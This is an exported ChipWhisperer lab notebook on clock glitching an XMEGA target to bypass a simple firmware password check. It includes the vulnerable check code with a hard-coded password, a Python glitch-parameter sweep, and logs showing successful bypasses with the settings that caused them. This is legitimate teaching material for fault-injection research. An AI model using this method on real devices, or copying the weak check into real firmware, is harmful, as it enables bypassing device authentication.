Part 1, Topic 2: Clock Glitching to Bypass Password¶
NOTE: This lab references some (commercial) training material on ChipWhisperer.io. You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.
SUMMARY: In the previous lab, we learned how clock glitching can be used to cause a target to behave unexpectedly. In this lab, we'll look at a slightly more realistic example - glitching past a password check
LEARNING OUTCOMES:
- Applying previous glitch settings to new firmware
- Checking for success and failure when glitching
Firmware¶
We've already seen how we can insert clock gliches to mess up a calculation that a target is trying to make. While this has many applications, some which will be covered in Fault_201, let's take a look at something a little closer to our original example of glitch vulnerable code: a password check. No need to change out firmware here, we're still using the simpleserial-glitch project (though we'll go through all the build stuff again).
The code is as follows for the password check:
uint8_t password(uint8_t* pw)
{
char passwd[] = "touch";
char passok = 1;
int cnt;
trigger_high();
//Simple test - doesn't check for too-long password!
for(cnt = 0; cnt < 5; cnt++){
if (pw[cnt] != passwd[cnt]){
passok = 0;
}
}
trigger_low();
simpleserial_put('r', 1, (uint8_t*)&passok);
return passok;
}
There's really nothing out of the ordinary here - it's just a simple password check. We can communicate with it using the 'p'
command.
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
SS_VER = 'SS_VER_2_1'
VERSION = 'HARDWARE'
CRYPTO_TARGET = 'TINYAES128C'
allowable_exceptions = None
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
import chipwhisperer as cw
try:
if not scope.connectStatus:
scope.con()
except NameError:
scope = cw.scope(hw_location=(5, 4))
try:
if SS_VER == "SS_VER_2_1":
target_type = cw.targets.SimpleSerial2
elif SS_VER == "SS_VER_2_0":
raise OSError("SS_VER_2_0 is deprecated. Use SS_VER_2_1")
else:
target_type = cw.targets.SimpleSerial
except:
SS_VER="SS_VER_1_1"
target_type = cw.targets.SimpleSerial
try:
target = cw.target(scope, target_type)
except:
print("INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.")
print("INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.")
scope = cw.scope(hw_location=(5, 4))
target = cw.target(scope, target_type)
print("INFO: Found ChipWhisperer😍")
# In[ ]:
if "STM" in PLATFORM or PLATFORM == "CWLITEARM" or PLATFORM == "CWNANO":
prog = cw.programmers.STM32FProgrammer
elif PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
prog = cw.programmers.XMEGAProgrammer
elif "neorv32" in PLATFORM.lower():
prog = cw.programmers.NEORV32Programmer
elif PLATFORM == "CW308_SAM4S" or PLATFORM == "CWHUSKY":
prog = cw.programmers.SAM4SProgrammer
else:
prog = None
# In[ ]:
import time
time.sleep(0.05)
scope.default_setup()
def reset_target(scope):
if PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
scope.io.pdic = 'low'
time.sleep(0.1)
scope.io.pdic = 'high_z' #XMEGA doesn't like pdic driven high
time.sleep(0.1) #xmega needs more startup time
elif "neorv32" in PLATFORM.lower():
raise IOError("Default iCE40 neorv32 build does not have external reset - reprogram device to reset")
elif PLATFORM == "CW308_SAM4S" or PLATFORM == "CWHUSKY":
scope.io.nrst = 'low'
time.sleep(0.25)
scope.io.nrst = 'high_z'
time.sleep(0.25)
else:
scope.io.nrst = 'low'
time.sleep(0.05)
scope.io.nrst = 'high_z'
time.sleep(0.05)
INFO: Found ChipWhisperer😍
scope.gain.mode changed from low to high scope.gain.gain changed from 0 to 30 scope.gain.db changed from 5.5 to 24.8359375 scope.adc.basic_mode changed from low to rising_edge scope.adc.samples changed from 24400 to 5000 scope.adc.trig_count changed from 12194083 to 23765629 scope.clock.adc_src changed from clkgen_x1 to clkgen_x4 scope.clock.adc_freq changed from 27348712 to 29538459 scope.clock.adc_rate changed from 27348712.0 to 29538459.0 scope.clock.clkgen_div changed from 1 to 26 scope.clock.clkgen_freq changed from 192000000.0 to 7384615.384615385 scope.io.tio1 changed from serial_tx to serial_rx scope.io.tio2 changed from serial_rx to serial_tx scope.io.hs2 changed from None to clkgen scope.io.tio_states changed from (1, 0, 0, 0) to (1, 1, 0, 0) scope.glitch.mmcm_locked changed from True to False
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../firmware/mcu/simpleserial-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE SS_VER=$2 -j
SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
avr-gcc (GCC) 5.4.0
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
mkdir -p objdir-CWLITEXMEGA
.
Welcome to another exciting ChipWhisperer target build!!
.
.
.
Compiling:
Compiling:
Compiling:
-en simpleserial-glitch.c ...
-en .././simpleserial/simpleserial.c ...
-en .././hal//xmega/XMEGA_AES_driver.c ...
.
.
Compiling:
Compiling:
-en .././hal//xmega/uart.c ...
-en .././hal//xmega/usart_driver.c ...
-e Done!
.
Compiling:
-en .././hal//xmega/xmega_hal.c ...
-e Done!
-e Done!
-e Done!
-e Done!
-e Done!
.
LINKING:
-en simpleserial-glitch-CWLITEXMEGA.elf ...
-e Done!
.
.
Creating load file for Flash: simpleserial-glitch-CWLITEXMEGA.hex
Creating load file for Flash: simpleserial-glitch-CWLITEXMEGA.bin
avr-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature simpleserial-glitch-CWLITEXMEGA.elf simpleserial-glitch-CWLITEXMEGA.hex
.
avr-objcopy -O binary -R .eeprom -R .fuse -R .lock -R .signature simpleserial-glitch-CWLITEXMEGA.elf simpleserial-glitch-CWLITEXMEGA.bin
Creating load file for EEPROM: simpleserial-glitch-CWLITEXMEGA.eep
avr-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" \
--change-section-lma .eeprom=0 --no-change-warnings -O ihex simpleserial-glitch-CWLITEXMEGA.elf simpleserial-glitch-CWLITEXMEGA.eep || exit 0
.
.
Creating Extended Listing: simpleserial-glitch-CWLITEXMEGA.lss
avr-objdump -h -S -z simpleserial-glitch-CWLITEXMEGA.elf > simpleserial-glitch-CWLITEXMEGA.lss
Creating Symbol Table: simpleserial-glitch-CWLITEXMEGA.sym
avr-nm -n simpleserial-glitch-CWLITEXMEGA.elf > simpleserial-glitch-CWLITEXMEGA.sym
Size after:
text data bss dec hex filename
2792 6 82 2880 b40 simpleserial-glitch-CWLITEXMEGA.elf
+--------------------------------------------------------
+ Default target does full rebuild each time.
+ Specify buildtarget == allquick == to avoid full rebuild
+--------------------------------------------------------
+--------------------------------------------------------
+ Built for platform CW-Lite XMEGA with:
+ CRYPTO_TARGET = NONE
+ CRYPTO_OPTIONS =
+--------------------------------------------------------
fw_path = "../../../firmware/mcu/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)
if SS_VER == 'SS_VER_2_1':
target.reset_comms()
XMEGA Programming flash...
XMEGA Reading flash...
Verified flash OK, 2797 bytes
def reboot_flush():
reset_target(scope)
#Flush garbage too
target.flush()
If we send a wrong password:
#Do glitch loop
pw = bytearray([0x00]*5)
target.simpleserial_write('p', pw)
val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
response = val['payload']
raw_serial = val['full_response']
error_code = val['rv']
print(val)
#print(bytearray(val['full_response'].encode('latin-1')))
{'valid': True, 'payload': CWbytearray(b'00'), 'full_response': CWbytearray(b'00 72 01 00 99 00'), 'rv': bytearray(b'\x00')}
We get a response of zero. But if we send the correct password:
#Do glitch loop
pw = bytearray([0x74, 0x6F, 0x75, 0x63, 0x68]) # correct password ASCII representation
target.simpleserial_write('p', pw)
val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
response = val['payload']
raw_serial = val['full_response']
error_code = val['rv']
print(val)
{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}
We get a 1 back. Set the glitch up as in the previous part:
scope.cglitch_setup()
Update the code below to also add an ext offset parameter:
gc = cw.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset"])
gc.display_stats()
Like before, we'll plot our settings. The plot is 2D, so you'll need to make a decision about what to plot. In this case, we'll plot offset and ext_offset, but pick whichever you like:
gc.glitch_plot(plotdots={"success":"+g", "reset":"xr", "normal":None}, x_index="ext_offset", y_index="offset")
And make a glitch loop. Make sure you use some successful settings that you found in the previous lab, since it will make this one much shorter!
One change you probably want to make is to add a scan for ext_offset. The number of places we can insert a successful glitch has gone way down. Doing this will also be very important for future labs.
from tqdm.notebook import tqdm
import re
import struct
sample_size = 1
if scope._is_husky:
gc.set_range("width", 3500, 4500)
gc.set_range("offset", 1300, 3200)
gc.set_global_step([400, 200, 100])
gc.set_range("ext_offset", 60, 100)
gc.set_step("ext_offset", 1)
else:
gc.set_global_step(1)
if PLATFORM == "CWLITEXMEGA":
gc.set_range("width", 45, 49.8)
gc.set_range("offset", -46, -49.8)
gc.set_range("ext_offset", 4, 70)
sample_size = 10
elif PLATFORM == "CW308_STM32F4":
gc.set_range("width", 0.4, 10)
gc.set_range("offset", 40, 49.8)
elif PLATFORM == "CWLITEARM":
gc.set_range("width", 0.8, 3.6)
gc.set_range("offset", -4, -2)
gc.set_range("ext_offset", 0, 100)
gc.set_global_step(0.4)
gc.set_step("ext_offset", 1)
scope.glitch.repeat = 1
reboot_flush()
broken = False
scope.adc.timeout = 0.5
for glitch_settings in gc.glitch_values():
scope.glitch.offset = glitch_settings[1]
scope.glitch.width = glitch_settings[0]
scope.glitch.ext_offset = glitch_settings[2]
for i in range(sample_size):
if scope.adc.state:
# can detect crash here (fast) before timing out (slow)
print("Trigger still high!")
gc.add("reset")
#Device is slow to boot?
reboot_flush()
scope.arm()
target.simpleserial_write('p', bytearray([0]*5))
ret = scope.capture()
if ret:
print('Timeout - no trigger')
gc.add("reset")
#Device is slow to boot?
reboot_flush()
else:
val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10, timeout=50)#For loop check
if val['valid'] is False:
gc.add("reset")
else:
if val['payload'] == bytearray([1]): #for loop check
#broken = True
gc.add("success")
print(val['payload'])
print(scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
print("🐙", end="")
#break
else:
gc.add("normal")
if broken:
break
Trigger still high!
Trigger still high!
CWbytearray(b'01') 44.921875 -47.65625 55 🐙
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
WARNING:root:SAM3U Serial buffers OVERRUN - data loss has occurred.
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
CWbytearray(b'01') 44.921875 -46.875 53 🐙CWbytearray(b'01') 44.921875 -46.875 53 🐙
CWbytearray(b'01') 44.921875 -46.875 53 🐙CWbytearray(b'01') 44.921875 -46.875 53 🐙
CWbytearray(b'01') 44.921875 -46.875 53 🐙CWbytearray(b'01') 44.921875 -46.875 53 🐙
CWbytearray(b'01') 44.921875 -46.875 53 🐙
CWbytearray(b'01') 44.921875 -46.875 53 🐙CWbytearray(b'01') 44.921875 -46.875 53 🐙
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
